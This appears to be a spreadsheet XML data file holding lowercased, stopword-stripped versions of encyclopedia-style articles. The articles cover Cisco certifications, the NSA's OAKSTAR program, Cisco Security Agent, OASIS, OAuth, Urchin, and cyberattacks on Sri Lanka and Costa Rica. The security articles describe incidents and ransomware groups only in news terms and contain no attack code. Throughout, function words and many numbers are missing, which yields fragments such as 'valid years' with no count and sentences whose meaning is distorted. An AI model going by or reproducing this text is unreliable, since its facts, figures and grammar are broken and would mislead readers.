customer sites. technicians work closely cisco technical assistance center (tac) quickly efficiently resolve support incidents.as november 2017, domains available certification: routing switching valid years. data center valid years. associate certifications ccna routing switching ccna routing switching certification covers skills necessary administer devices small medium-sized networks. this certification requires icnd1 100-105 icnd2 200-105 exams. examinees take exams separately composite 200-125 ccna exam. exists generally prerequisite advanced certifications, ccnp exams cisco design certifications, e.g. ccnp, ccda, ccdp, etc. pearson test centers conduct exams.all ccna-certified individuals specialize technology. previously, specialized tracks required passing maintaining ccna certification, expiration series tests longer case. autumn 2015, ccna certifications prerequisites. starting february 2020, ccna specializations consolidated. 200-301 cisco certified network associate exam exam available ccna-level. valid years. ccda cisco-certified design associate (ccda) certified engineers design switched routed networks lans, wans broadband services. ccda exam (200-310 desgn) requires ccent minimum, though either ccna ccie serve prerequisite, well switch-level knowledge cisco-based lans.valid years. ccna cloud internet everything (ioe) era, valuable connections made every around world. potential multitrillion u.s. dollar market value companies industries next decade. take advantage opportunity, businesses using public, private, hybrid cloud delivery models deliver personalized services, real-time access information, instant communications anytime, anywhere, device. cloud major enabler ioe, providing access applications services network device.valid years. ccna collaboration cisco certified collaboration associate certification cisco engineers specialize cisco's unified communications (uc) products. collaboration engineers focus deployment support voice, video, live text communication solutions across networks. valid years. ccna cyberops ccna cyber certification prepares candidates begin career working associate-level cybersecurity analysts within security operations centers. valid years. ccna industrial cisco certified network associate industrial (ccna industrial) certification plant administrators, control system engineers traditional network engineers manufacturing, process control, industries, involved convergence industrial networks. valid years. ccna security ccna security validates knowledge security infrastructure, threats, vulnerabilities networks threat mitigation. required skills include installation, troubleshooting monitoring network devices maintain integrity, confidentiality, availability data devices. earn certification must pass 210-260 iins (implementing cisco network security) exam, well hold current ccna certification. ccna-security prerequisite ccnp security certification. represents required exam earn certification continuing security certification path ccnp.note: ccna security courseware holds compliance cnss training standard cnss 4011. remaining compliant, ccna security program provides required training network security professionals assist private sector entities federal agencies united states, protects information defense united states infrastructure. candidates passed ccna security receive letter recognition acknowledging cnss 4011 training requirements.valid years. ccna service provider ccna service provider focuses validates ability configure implement baseline cisco service provider next-generation networks. required exams 640-875 building cisco service provider next-generation networks, part 1(spngn1) 640-878 building cisco service provider next-generation networks, part (spngn2). standard ccna certification prerequisite. class, "building cisco service provider next-generation networks" delivered parts. part 5-day instructor-led course provides basic knowledge skills necessary support service provider network. course provides knowledge major network components helps learners understand service provider networks function. course introduces next-generation network ngn) architecture. course also includes remote labs help gain practical skills deploying basic cisco cisco software features. part 5-day instructor-led course provides knowledge network construction architecture. course includes additional remote labs.valid years. ccna wireless ccna wireless certification covers wireless lans, including networking associates/administrators, wireless support specialists, wlan project managers. certification validates skills configuration, implementation, support wireless lans. 200-355 wifund (implementing cisco wireless networking essentials) required exam. valid years. professional certifications cisco certified network professional (ccnp) certifications validate knowledge skills required install, configure, troubleshoot converged local- wide-area networks end-devices. needs valid ccna certification obtain ccnp certification. ccnp routing switching ccnp validates ability plan, implement, verify, troubleshoot local wide-area enterprise networks work collaboratively specialists advanced security, voice, wireless, video solutions. addition ccna exams, professionals must pass three separate professional-level exams. certification track changed july 2010, various migration paths available begun, completed, ccnp certification process. july 2014, cisco released version ccnp exams training courses, reflect alignment changing industry roles addition study materials." january 2015 last test using v1.0 exams. january 2015, v2.0 exam offered.required exams (v1.0): 642-902 route: implementing cisco routing (route) 642-813 switch: implementing cisco switched networks (switch) 642-832 tshoot: troubleshooting maintaining cisco networks (tshoot)required exams (v2.0): 300-101 route: implementing cisco routing (route) 300-115 switch: implementing cisco switched networks (switch) 300-135 tshoot: troubleshooting maintaining cisco networks (tshoot) ccdp with ccdp certification, network professional discuss, design, create advanced addressing routing, security, network management, data center, multicast enterprise architectures include virtual private networking wireless domains. active ccda certification acts prerequisite certification. required exams: 300-101 route: implementing cisco routing (route) 300-115 switch: implementing cisco switched networks (switch) 300-320 arch: designing cisco network service architecturenote ccdp requires 300-101 route 300-115 switch. after passing ccnp ccda, ccdp requires 300-320 arch. ccnp collaboration required pass four exams: 300-070 ciptv1 implementing cisco telephony video, part (ciptv1) 300-075 ciptv2 implementing cisco telephony video, part (ciptv2) 300-080 ctcollab troubleshooting cisco telephony video (ctcollab) 300-085 capps implementing cisco collaboration applications (capps) ccnp data center ccnp data center validates knowledge data center design, equipment installation, maintenance.five required exams: 300-175 dcuci implementing cisco data center unified computing (dcuci) 300-165 dcii implementing cisco data center infrastructure (dcii) 300-170 dcvai implementing cisco data center virtualization automation (dcvai) 300-160 dcid designing cisco data center infrastructure (dcid)or 300-180 dcit troubleshooting cisco data center infrastructure (dcit) ccnp security formerly cisco certified security professional (ccsp). ccnp security certification program aligns role cisco network security engineer, responsibility security routers, switches, networking devices, appliances, well choosing, deploying, supporting, troubleshooting firewalls, vpns, ids/ips solutions networking environments. ccnp security certification requires ccna security ccie certification. ccnp service provider ccnp service provider certification replaced retiring ccip certification. required exams: 642-883 sproute: deploying cisco service provider network routing 642-885 spadvroute: deploying cisco service provider advanced routing 642-887 spcore: implementing cisco service provider next-generation core network services 642-889 spedge: implementing cisco service provider next-generation edge network services ccnp wireless ccnp wireless covers aspects wireless networking principles theory. this certification requires four tests, covering wireless site survey, wireless voice networks, wireless mobility services, wireless security. prerequisite acts valid ccna wireless certification. required exams: 642-732 cuwss: conducting cisco unified wireless site survey (cuwss) 642-742 iuwvn: implementing cisco unified wireless voice networks (iuwvn) 642-747 iuwms: implementing cisco unified wireless mobility services (iuwms) 642-737 iauws: implementing advanced cisco unified wireless security (iauws) expert-level certifications cisco certified internetwork expert represents cisco's highest certification, comprising seven tracks present, tracks updated retired frequently aligned industry's latest technologies trends. october 2010, 25,810 people held active ccie certifications. certmag, voted technically advanced certification statistics generally report highest salaried certification salary surveys. ccie began 1993, originally two-day lab, later changing one-day format. fewer cisco-certified individuals attain ccie certification and, average, spend thousands dollars months studying passing. many candidates build training labs home using equipment, sell candidates passing. alternatively, candidates rent "rack time" online. ccie consists written exam "lab" exam track). written exam acts prerequisite exam cost $400 attempt. written exam consists questions must completed within hours. upon passing written exam, candidate eighteen months take exam. candidate three years passing written exam successfully complete lab. eight-hour, hands-on exam designed demonstrate candidate knows internetworking theory demonstrates advanced hands-on mastery. candidates pass ccie interval must re-pass written exam attempting ccie exam. minimum waiting time attempts month. july 2014, ccie costs $1600 attempt cisco locations offer worldwide. some locations offer ccie tracks. according cisco survey, $9050 represents average cost prepare ccie certification april 2006, gets spent mostly practice equipment study material. formal prerequisites currently exist ccie written exam, cisco recommends least years networking experience. ccie exists first cisco certified qualification certifications existed previously. associate professional certifications recognized fact ccie overkill many networking personnel. cisco chosen make lower level certifications prerequisites ccie certification. knowledge hold multiple ccie certifications. adam mccombs cited qualification "essentially internet" season episode shark tank. upon successful completion exam, cisco awards ccie number ccie. first ccie number allocated 1993) started 1,024 increased thereafter. august 2011, highest ccie number allocated reached 30,000. first number allocated first ccie location, rather individual, featured plaque entrance lab. they awarded number 1025 stuart biggs, created first written exam first exam. first person pass ccie written exams, known terry slattery, consulted cisco began development. slattery held first ccie work cisco. each ccie retains number regardless many certifications receives. every years ccie take written test retain certification. done, certification becomes suspended. after year without passing, certification becomes revoked. regain certification starting scratch. re-certification occur years expiration date. after certification/re-certification, ccie must wait months re-certifying. ccie exams administered special ccie test centers around world. however, tracks testing available location. ccar cisco certified architect (ccar) certification assesses experience competency network designers support increasingly complex networks global organizations effectively translate business strategies technical strategies.the cisco certified architect certification administered board exam. candidates propose defend architecture solution business requirements. candidates asked modify proposals fly," based additional requirements presented board. prerequisites include ccde certification, approximately years industry experience, acceptance program application process. responsibilities cisco certified architect: lead creation evolution enterprise architecture analyze technology industry market trends establish governing principles enterprise networks selection technology products identification organization resource needs lead development communication education plan enterprise network architecture ccie routing switching routing switching seem popular track, 35,272 worldwide certified individuals 2012. certification covers variety networking concepts protocols. ccde ccde runs parallel established ccie program, areas providing higher skill-set ccie. specifically, ccde identifies network professionals expert network design skills. network design translates business requirements end-to-end network designs solutions approach network expansion integration. ccde focuses network architecture cover implementation operations. ccde supplies vendor-neutral curriculum, testing business requirements analysis, design, planning, validation practices. course came employers needed identify experienced network designers architects could address aspects existing networking technologies trends. while engineers (including many ccies) fulfilled role, certification advanced beyond ccdp certification. ccde numbering adopts different format ccie appears split year number within year. uses ccie tools verify qualified status. ccde certified individuals ccie qualification exams re-certify vice versa. ccde provides advanced network infrastructure design principles fundamentals large networks. ccde demonstrate ability develop solutions address planning, design, integration, optimization, operations, security, ongoing support focused infrastructure level. ccie collaboration voice track covers advanced topics subjects quality service, mgcp, call manager (cisco's voip pbx), cisco unity connection (cisco's voice messaging platform), unity express, unified contact center express, cisco unified presence server, cisco's hwic-4esw, 3750-24ps. most candidates pass three four attempts, required six. many reputed exam seems much test time management planning technical expertise. widely dissimilar platforms used sets voice exam apart ccie exams. must make configurations windows server environment, callmanager web-based gui, command line. such, involves back-and-forth fine tuning numerous platforms. 2013, cisco announced retire ccie voice track introduce ccie collaboration track, including topics virtualization, jabber instant messaging video. after protest current aspirant ccie voice holders, argued differences remain warrant retiring track option transition track, cisco offered transition path existing voice holders. collaboration written exam availability starting november 2013. exam transition voice collaboration february 2014. ccie data center cisco announced september availability ccie data center certification, certifies expert-level skills required plan, prepare, operate, monitor, troubleshoot complex data center networks. ccie data center written exam available sept. 2012; exam availability october. ccie security security track covers advanced topics subjects asa, firepower, security, wireless security, content security, antimalware protection many others. ccie service provider cisco ccie service provider (ccie certification validates expert level skills required network engineer configure, build, troubleshoot, optimize complex highly available service provider core infrastructure. candidates preparing ccie certification possess thorough knowledge core, aggregation/edge, remote access technologies, layer vpns, plus managed services traversing core network. ccie wireless candidates pass ccie wireless certification exams demonstrate broad theoretical knowledge wireless networking solid understanding wireless local area networking (wlan) technologies cisco. specialist certification addition vast amount certifications above, cisco also provides specialist certifications. exams certifications often focused specific technology generally targeted members cisco partner program, including selling, designing, supporting cisco products services. combining various exams, cisco partner gain specialty status thus qualify additional partner benefits.specialisations held express, advanced master levels, reflecting depth partners skills across certain technologies architectures, held technology portfolio, architecture. specialisations are: business: business value practitioner, business value specialist business architecture specialist, business architecture practitioner enterprise business specialist collaboration data center internet things network programmability operating system software security service provider references</t>
  </si>
  <si>
    <t>OAKSTAR</t>
  </si>
  <si>
    <t>oakstar secret internet surveillance program national security agency (nsa) united states. disclosed 2013 part leaks former contractor edward snowden. oakstar umbrella program involving surveillance telecommunications. falls category "upstream collection", meaning data pulled directly fiber-optic cables top-level communications infrastructure. upstream collection programs allow access high volumes data, pre-selection done providers themselves, data passed nsa. 2013 budget oakstar $9.41 million. oakstar consists following sigads: note: sigads otherwise designated presumed operate legal authority section fisa amendments (faa) glossary dni: digital network intelligence dnr: dial number recognition marina: database internet metadata timing advances: explanation provided source material. transit authority: legal authority states communications transit united states collectible, provided endpoints foreign. media relating oakstar upstream collection references</t>
  </si>
  <si>
    <t>Cisco Security Agent</t>
  </si>
  <si>
    <t>cisco security agent (csa) endpoint intrusion prevention system software system made originally okena (formerly named stormwatch agent), bought cisco systems 2003. software rule-based, examines system activity network traffic, determining behaviors normal indicate attack. offered replacement cisco host sensor, announced end-of-life february 2003. this life action result cisco's acquisition okena, inc., cisco security agent product line based okena technology would replace cisco host sensor product line entercept. result end-of-life action, cisco offered no-cost, one-for-one product replacement/migration program cisco host sensor customers cisco security agent product line. intent program support existing host sensor customers choose migrate cisco security agent product line. cisco host sensor customers eligible migration program, whether customer purchased cisco software application support (sas) service contract cisco host sensor products. uses three-tier client-server architecture. management center 'mc' management console) contains program logic; database backend used store alerts configuration information; database co-resident system. agent installed desktops and/or servers protected. agent communicates management center, sending logged events management center receiving updates rules occur. network world article dated december 2009 stated "cisco hinted end-of-life mars". full article linked below. june 2010, cisco announced end-of-life end-of-sale csa. cisco offer replacement product. also network intrusion prevention system references external links [1]- "surviving cisco transition" endpoint security whitepaper alternative end-of-life announcement cisco press release cisco security agent cisco's product page agent software cisco case study cisco security agent cisco host sensor migration program cisco host sensor product line cisco hinted network world article</t>
  </si>
  <si>
    <t>OASIS (organization)</t>
  </si>
  <si>
    <t>organization advancement structured information standards (oasis; nonprofit consortium works development, convergence, adoption open standards cybersecurity, blockchain, internet things (iot), emergency management, cloud computing, legal data exchange, energy, content technologies, areas. history oasis founded name "sgml open" 1993. began trade association standard generalized markup language (sgml) tool vendors cooperatively promote adoption sgml mainly educational activities, though amount technical activity also pursued including update cals table model specification specifications fragment interchange entity management.in 1998, movement industry xml, sgml open changed emphasis sgml xml, changed name oasis open inclusive reflect expanded scope technical work standards. focus consortium's activities also moved promoting adoption getting much attention own) developing technical specifications. july 2000 technical committee process approved. with adoption process manner technical committees created, operated, progressed work regularized. adoption process five technical committees; 2004 nearly during 1999, oasis approached un/cefact, committee united nations dealing standards business, jointly develop specifications electronic business. joint initiative, called "ebxml" first november 1999, chartered three-year period. final meeting original charter, vienna, un/cefact oasis agreed divide remaining work organizations coordinate completion work coordinating committee. 2004 oasis submitted completed ebxml specifications tc154 approved 15000. consortium headquarters burlington, massachusetts, shared companies. september 2014, consortium moved corporate drive suite corporate suite 150, still loop route. standards development following standards development maintained oasis technical committees: amqp advanced message queuing protocol, application layer protocol message-oriented middleware. business centric-methodology, comprehensive approach proven techniques enable service-oriented architecture (soa) support enterprise agility interoperability. content assembly mechanism, generalized assembly mechanism using templates business transaction content associated rules. templates augment schema syntax provide implementers means specify interoperable interchange patterns. camp cloud application management platforms, managing public private cloud applications. common alerting protocol, xml-based data format exchanging public warnings emergencies alerting technologies. customer data platform, specification aims standardize exchange customer data across systems silos defining web-based using graphql. cmis content management interoperability services, domain model services standard working enterprise content management repositories systems. customer information quality, specifications defining, representing, interoperating managing party information (e.g. name, address). docbook docbook, markup language technical documentation. originally intended authoring technical documents related computer hardware software used sort documentation. dita darwin information typing architecture, modular extensible xml-based language topic-based information, online help, documentation, training. election markup language, information standards processes conducting democratic elections using xml-based information recording. edxl emergency data exchange language, suite xml-based messaging standards facilitate emergency information sharing government entities full range emergency-related organizations geoxacml geospatial extensible access control markup language, geo-specific extension xacml version 2.0, mainly geometric data-type urn:ogc:def:datatype:geoxacml:1.0:geometry several geographic functions topological, bag, set, geometric conversion functions. kmip management interoperability protocol tries establish single, comprehensive protocol communication enterprise management systems encryption systems. legal legaldocumentml (akoma ntoso), legalruleml, electronic court filing, enotarization standards. mqtt message queuing telemetry transport, client-server, publish/subscribe messaging transport protocol. light weight, open, simple, designed easy implement. these characteristics make ideal many situations, including constrained environments communication machine machine (m2m) internet things (iot) contexts small code footprint required and/or network bandwidth premium. obix open building information exchange, extensible specification enterprise interaction building-based other) control systems, including hvac, access control, intrusion detection, many others. odata open data protocol (odata), simplifying data sharing across disparate applications enterprise, cloud, mobile devices. opendocument oasis open document format office applications, open document file format saving office documents spreadsheets, memos, charts, presentations. oslc open services lifecycle collaboration, (oslc) develops standards make easy practical software lifecycle tools share data another. oslc community site (http://open-services.net) details. pkcs pkcs standard defines platform-independent cryptographic tokens, hardware security modules (hsm) smart cards, names "cryptoki" (from "cryptographic token interface" pronounced "crypto-key" "pkcs #11" often used refer well standard defines it). saml security assertion markup language, standard xml-based framework secure exchange authentication authorization information. sarif static analysis results interchange format, standard json-based format output static analysis tools. solution deployment descriptor, standard xml-based schema defining standardized express software installation characteristics required lifecycle management multi-platform environment. spml service provisioning markup language, standard xml-based protocol integration interoperation service provisioning requests. tosca topology orchestration specification cloud applications, standard describe cloud services, relationships parts service, operational behavior services. universal business language, international effort define royalty-free library standard electronic business documents (purchase order, invoice, waybill, etc.) xml. approved iso/iec 19845:2015. serves basis numerous electronic commerce networks implementations worldwide. uddi universal description discovery integration, platform-independent, xml-based registry companies individuals list services. virtio virtual i/o, standard paravirtualized devices. webcgm computer graphics metafile, profile computer graphics metafile (cgm), adds linking optimized applications technical illustration, electronic documentation, geophysical data visualization, similar fields. ws-bpel services business process execution language wsdm services distributed management xacml extensible access control markup language, standard xml-based protocol access control policies. data interchange, standard sharing, linking, synchronizing data ("dataweb") across multiple domains applications using documents, extensible resource identifiers (xris), method distributed data control called link contract. xliff localization interchange file format, xml-based format created standardize localization. extensible resource identifier, uri-compatible scheme resolution protocol abstract identifiers used identify share resources across domains applications. members adhesion consortium requires fees paid, must renewed annually, depending membership category adherents want access. among adherents members american association, collabora, dell, eclecticiq, general motors, ibm, iso/iec, e.v., microsoft, novell, oracle, hat, document foundation, universities, government agencies, individuals employees less-known companies. member sections member sections special interest groups within consortium focus specific topics. these sections keep distinguishable identity full autonomy define work programme agenda. integration member section standardization process organized technical committees. active member sections example: legal idtrustmember sections completed achieved objectives. standards promoted maintained relevant technical committees directly within oasis. example: amqp ws-i patent disclosure controversy like many bodies producing open standards e.g. ecma, oasis added reasonable non-discriminatory licensing (rand) clause policy february 2005. that amendment required participants disclose intent apply software patents technologies consideration standard. contrary w3c, requires participants offer royalty-free licenses anyone using resulting standard, oasis offers similar royalty free limited terms mode, along royalty free rand terms mode rand (reasonable non-discriminatory) mode committees. compared w3c, oasis less restrictive regarding obligation companies grant royalty-free license patents own.controversy rapidly arisen licensing added silently allows publication standards could require licensing payments patent holders. this situation could effectively eliminate possibility free/open source implementations standards. further, contributors could initially offer royalty-free patent, later imposing per-unit fees, standard accepted. april 2005, york times reported committed free, patents oasis group. larry rosen, software expert leader reaction rose oasis quietly included rand clause policy, welcomed initiative supposed oasis continue using policy companies involved would follow. history proved wrong, rand policy still removed commercial companies published free statement towards oasis. patrick gannon, president oasis 2001 2008, minimized risk company could take advantage standard request royalties established: option nobody uses, what's harm?". hiser, former marketing lead defunct openoffice.org, explained patents towards open standard counterproductive inappropriate. also argued microsoft shifting standardization efforts oasis, leverage probably patents portfolio future. hiser also attributed rand change oasis policy microsoft.the rand term could indeed theoretically allow company involved leverage patent future. amendment probably added attract companies consortium, encourage contributions potential participants. actors like microsoft could indeed applied pressure made sine-qua-non condition access consortium, possibly jeopardize/boycott standard clause present. criticism doug mahugh working microsoft promoter office open xml, microsoft document format competing oasis's iso/iec 26300, i.e. v1.0) claimed "many countries expressed frustration pace oasis's responses defect reports submitted iso/iec 26300 inability members participate maintenance odf." however, weir, co-chair oasis technical committee noted time, "the received zero defect reports iso/iec national body japan". added submitter original japanese defect report, murata mokoto, satisfied preparation errata. also self-published blog post blaming microsoft involving people improve modify accuracy openxml wikipedia articles, trying make sound risky adopt. also uima references external links official website oasis specifications call action oasis oasis making easier standards without worries</t>
  </si>
  <si>
    <t>Cisco Certified Entry Networking Technician</t>
  </si>
  <si>
    <t>cisco certified entry networking technician (ccent) certification first stage cisco's certification system. certification retired february 2020. ccent certification interim step associate level directly ccna ccda certifications. while ccent covered basic networking knowledge; involved intricate technical aspects cisco routing switching network design. certification validated skills essential entry-level network support positions. ccent qualified individuals knowledge skill install, manage, maintain troubleshoot small enterprise branch network, including network security. ccent curriculum covered networking fundamentals, technologies, basic security, routing switching fundamentals, configuring simple networks. applicable training cisco icnd1 ("interconnecting cisco network devices, part exam ("100-105" icnd1), costing $165 retail. certification valid years. ccent qualifying exam, icnd1 retired february 2020. existing ccent holders continue active valid ccent certification years issue date. also ccna cisco ccda certification references external links official website</t>
  </si>
  <si>
    <t>OAuth</t>
  </si>
  <si>
    <t>oauth ("open authorization") open standard access delegation, commonly used internet users grant websites applications access information websites without giving passwords. this mechanism used companies amazon, google, facebook, microsoft, twitter permit users share information accounts third-party applications websites. generally, oauth provides clients "secure delegated access" server resources behalf resource owner. specifies process resource owners authorize third-party access server resources without providing credentials. designed specifically work hypertext transfer protocol (http), oauth essentially allows access tokens issued third-party clients authorization server, approval resource owner. third party uses access token access protected resources hosted resource server. particular, oauth provides specific authorization flows applications, desktop applications, mobile phones, smart devices. history oauth began november 2006 blaine cook developing twitter openid implementation. meanwhile, ma.gnolia needed solution allow members openids authorize dashboard widgets access service. cook, chris messina larry halff magnolia david recordon discuss using openid twitter magnolia apis delegate authentication. they concluded open standards access delegation.the oauth discussion group created april 2007, small group implementers write draft proposal open protocol. dewitt clinton google learned oauth project, expressed interest supporting effort. july 2007, team drafted initial specification. eran hammer joined coordinated many oauth contributions creating formal specification. december 2007, oauth core final draft released.at 73rd internet engineering task force (ietf) meeting minneapolis november 2008, oauth held discuss bringing protocol ietf standardization work. event well attended wide support formally chartering oauth working group within ietf. oauth protocol published 5849, informational request comments, april 2010. since august 2010, third party twitter applications required oauth.the oauth framework published considering additional cases extensibility requirements gathered wider ietf community. albeit built oauth deployment experience, oauth backwards compatible oauth 1.0. oauth published 6749 bearer token usage 6750, standards track requests comments, october 2012.the oauth authorization framework draft stage consolidates functionality rfcs oauth 2.0, oauth native apps, proof code exchange, oauth browser-based apps, oauth security best current bearer token usage. security issues oauth april 2009, session fixation security flaw protocol announced. affects oauth authorization flow (also known "3-legged oauth") oauth core section version 1.0a oauth core protocol issued address issue. oauth january 2013, internet engineering task force published threat model oauth 2.0. among threats outlined called "open redirector"; early 2014, variant described name "covert redirect" wang jing.oauth analyzed using formal protocol analysis. this analysis revealed setups multiple authorization servers, behaving maliciously, clients become confused authorization server forward secrets malicious authorization server mix-up attack). this prompted creation best current practice internet draft sets define security standard oauth 2.0. assuming mix-up attack place, security oauth proven strong attacker models using formal analysis.one implementation oauth numerous security flaws exposed.in april 2017, million users gmail (less 0.1% users 2017) targeted oauth-based phishing attack, receiving email purporting colleague, employer friend wanting share document google docs. those clicked link within email directed sign allow potentially malicious third-party program called "google apps" access "email account, contacts online documents". within "approximately hour", phishing attack stopped google, advised given "google apps" access email revoke access change passwords. draft oauth pkce extension native apps recommended kinds oauth clients, including applications confidential clients order avoid malicious browser extensions perform oauth code injection attack. uses facebook's graph supports oauth 2.0. google supports oauth recommended authorization mechanism apis. microsoft also supports oauth various apis azure active directory service, used secure many microsoft third party apis. oauth used authorizing mechanism access secured rss/atom feeds. access rss/atom feeds require authentication always issue. example, feed secured google site could accessed using google reader. instead, three-legged oauth would used authorize client access feed google site. oauth standards oauth service complementary distinct openid. oauth unrelated oath, reference architecture authentication, standard authorization. however, oauth directly related openid connect (oidc), since oidc authentication layer built oauth 2.0. oauth also unrelated xacml, authorization policy standard. oauth used conjunction xacml, oauth used ownership consent access delegation whereas xacml used define authorization policies (e.g., managers view documents region). openid vis-à-vis pseudo-authentication using oauth oauth authorization protocol, rather authentication protocol. using oauth authentication method referred pseudo-authentication. following diagrams highlight differences using openid (specifically designed authentication protocol) oauth authorization. communication flow processes similar: (not pictured) user requests resource site login application. site sees user authenticated. formulates request identity provider, encodes sends user part redirect url. user's browser makes request redirect identity provider, including application's request necessary, identity provider authenticates user (perhaps asking username password) once identity provider satisfied user sufficiently authenticated, processes application's request, formulates response, sends back user along redirect back application. user's browser requests redirect goes back application, including identity provider's response application decodes identity provider's response, carries accordingly. (oauth only) response includes access token application gain direct access identity provider's services user's behalf.the crucial difference openid authentication case, response identity provider assertion identity; oauth authorization case, identity provider also provider, response identity provider access token grant application ongoing access identity provider's apis, user's behalf. access token acts kind "valet key" application include requests identity provider, prove permission user access apis. because identity provider typically (but always) authenticates user part process granting oauth access token, tempting view successful oauth access token request authentication method itself. however, oauth designed case mind, making assumption lead major security flaws. oauth xacml xacml policy-based, attribute-based access control authorization framework. provides: access control architecture. policy language express wide range access control policies including policies consents handled defined oauth. request response scheme send receive authorization requests.xacml oauth combined deliver comprehensive approach authorization. oauth provide policy language define access control policies. xacml used policy language. where oauth focuses delegated access user, grant twitter access facebook wall), identity-centric authorization, xacml takes attribute-based approach consider attributes user, action, resource, context (who, what, where, when, how). with xacml possible define policies managers view documents department managers edit documents draft modexacml provides fine-grained access control oauth does. oauth limited granularity coarse functionality (the scopes) exposed target service. result, often makes sense combine oauth xacml together oauth provide delegated access case consent management xacml provide authorization policies work applications, processes, data. lastly, xacml work transparently across multiple stacks (apis, sso, esbs, home-grown apps, databases...). oauth focuses exclusively http-based apps. controversy eran hammer resigned role lead author oauth project, withdrew ietf working group, removed name specification july 2012. hammer cited conflict enterprise cultures reason leaving, noting ietf community "all enterprise cases" "not capable simple". "what offered blueprint authorization protocol", noted, "that enterprise way", providing "whole frontier sell consulting services integration solutions". comparing oauth oauth 1.0, hammer points become "more complex, less interoperable, less useful, incomplete, importantly, less secure". explains architectural changes unbound tokens clients, removed signatures cryptography protocol level added expiring tokens (because tokens could revoked) complicating processing authorization. numerous items left unspecified unlimited specification nature working group, issue small stuck leave open implementation decide."david recordon later also removed name specifications unspecified reasons. dick hardt took editor role, framework published october 2012.david harris, author email client pegasus mail, criticised oauth absolute dog's breakfast", requiring developers write custom modules specific service (gmail, microsoft mail services, etc.), register specifically them. also list oauth providers data portability indieauth mozilla persona saml user-managed access references external links oauth.com oauth.net</t>
  </si>
  <si>
    <t>2021 cyberattacks on Sri Lanka</t>
  </si>
  <si>
    <t>2021 cyberattacks lanka series cyberattacks least lankan national websites including google.lk domain. first cyber-attack first cyber-attack launched domain registry website february 2021. investigations currently carried lanka computer emergency readiness team along information technology society lanka (itssl). telecommunications regulatory commission lanka also tweeted regarding cyberattack public alert. second cyber-attack second cyber-attack carried 2021. website chinese embassy operating lanka, websites health ministry, energy ministry rajarata university websites affected cyberattack. this cyber attack conducted group called 'tamil eelam cyber force'. cyber-attack prime minister mahinda's website official website lankan prime minister mahinda rajapaksa hacked june 2021. information technology society lanka itssl said pm’s website hacked manner visitor website would redirected another website displays content related bitcoin cryptocurrency. references</t>
  </si>
  <si>
    <t>Urchin (software)</t>
  </si>
  <si>
    <t>urchin discontinued statistics analysis program developed urchin software corporation. urchin analyzed server file content displayed traffic information website based upon data. sales urchin products ended march 2012.urchin software could different data collection modes: file analyzer hybrid. file analyzer, urchin processed server files variety file formats. custom file formats could also defined. hybrid, urchin combined page tags file data eradicate limitations data collection method isolation. result accurate visitor data.urchin became popular solutions website traffic analysis, particularly isps hosting providers. this largely scalability performance pricing model.urchin software corp. acquired google april 2005, forming google analytics. april 2008, google released urchin february 2009, google released urchin 6.5, integrating adwords. urchin released september 2010 included 64-bit support, event tracking, among features. also parameters list analytics software references external links official urchin software website</t>
  </si>
  <si>
    <t>2022 Costa Rican ransomware attack</t>
  </si>
  <si>
    <t>beginning night (utc-6:00) april 2022, cyberattack began nearly institutions government costa rica, including ministry finance, ministry science, innovation, technology telecommunications (micitt), national meteorological institute, state internet service provider racsa, costa rican social security fund (caja costarricense seguro social, ccss), ministry labor social security, fund social development family allowances, administrative board municipal electricity service cartago.the pro-russian group conti group claimed first group attacks demanded us$10 million ransom exchange releasing information stolen ministry finance, could include sensitive information citizens' returns companies operating costa rica.as consequence, government shut computer systems used declare taxes control management imports exports, causing losses productive sector order us$30 million day. likewise, pages ministry science, innovation, technology telecommunications removed network. costa rica required technical assistance united states, israel, spain, microsoft, among others, deal cyber attack. attack consisted infections computer systems ransomware, defacement pages, theft email files attacks social security human resources portal, well official twitter account.on 2022, united states government offered us$10 million reward information leading identification person persons leadership position within conti group, additional us$5 million information leading capture conviction, country, individuals aided conspired carry conti ransomware attacks.on 2022, president costa rica, rodrigo chaves robles, decreed state national emergency cyber attacks, considering terrorism. days later, press conference, stated country state evidence people inside costa rica helping conti, calling "traitors" "filibusters".on 2022, dawn, hive ransomware group carried attack costa rican social security fund, forcing institution turn critical systems, including unique digital health file centralized collection system. former stores sensitive medical information patients using social security, latter used collect population's insurance fees. background conti group conti group criminal organization dedicated carrying ransomware attacks, stealing files documents servers demanding ransom. modus operandi infect computers conti malware, operates individual logical threads, making much faster viruses kind.the oldest member known aliases stern demon acts ceo. another member known mango acts general manager communicates frequently stern. mango told stern message people core team. numbers people involved fluctuate, reaching 100. constant turnover members, group recruits members legitimate recruitment sites hacker sites.ordinary programmers earn $1,500 $2,000 month, members negotiate ransom payments take profits. april 2021, member conti group claimed anonymous journalist take ransomware payments pressuring victims pay.during russian invasion ukraine 2022, conti group announced support russia threatened implement "retaliatory measures" cyber-attacks launched country. result, anonymous person leaked approximately 60,000 internal chat messages along source code files used group.opinions expressed leaks include support vladimir putin, vladimir zhirinovsky, antisemitism (including towards volodymyr zelensky). member known patrick repeated several false claims made putin ukraine. patrick lives australia russian citizen. messages containing homophobia, misogyny references child abuse also found.conti responsible hundreds ransomware incidents since 2020. estimates that, january 2022, 1,000 victims attacks associated conti ransomware victim payouts exceeding $150 million, making conti's damaging ransomware strain ever documented.days fbi's announcement, conti announced would begin shutdown process. some conti members migrated smaller organizations like hive, hellokitty, avoslocker, blackcat, blackbyteo; others founded groups own. hive ransomware group hive ransomware group criminal organization known cruelty public health organizations institutions, particularly hospitals clinics. first appeared june 2021, according federal bureau investigation (fbi), works affiliate-based ransomware. employs wide variety tactics, techniques, procedures (ttps), creating significant challenges defense mitigation. hive uses multiple mechanisms compromise business networks, including phishing emails malicious attachments gain access remote desktop protocol (rdp) move network.according cisco report, hive criminals evidenced operational security revealing information encryption process operational details. report also indicates hive employs means necessary convince victims pay, including offering bribes victims' negotiators ransom payment made.in august 2021, zdnet reported hive attacked least healthcare organizations united states, hitting clinics hospitals across ohio west virginia. among victims memorial healthcare system, forced hospitals paper records, cancel procedures, refer patients non-compromised facilities. organization ended paying ransom regain access systems.in december 2021, hive revealed attacked companies months, vast majority united states. those, least ended paying ransom systems back.in february 2022, four researchers kookmin university south korea discovered vulnerability hive ransomware encryption algorithm allowed obtain master recover hijacked information.the specialized site techtarget stated hive ransomware group communicates russian, information location operations.bleeping computer reported conti hackers migrated organizations hive; however, group denied connection conti, despite fact process closing operations began hackers reached criminal group, organization began employ tactic publishing leaked data deep web, conti did. advintel expert yelisey boguslavskiy identified confirmed high level certainty conti working hive half year, since least november 2021. according information, hive actively using initial attack access provided conti. unlike conti group, hive associated direct support russian invasion ukraine, even though ransom payment hive likely received people within conti claimed group's collective alignment russian government.also 2022, hive attacked community navarra, spain, forcing hundred 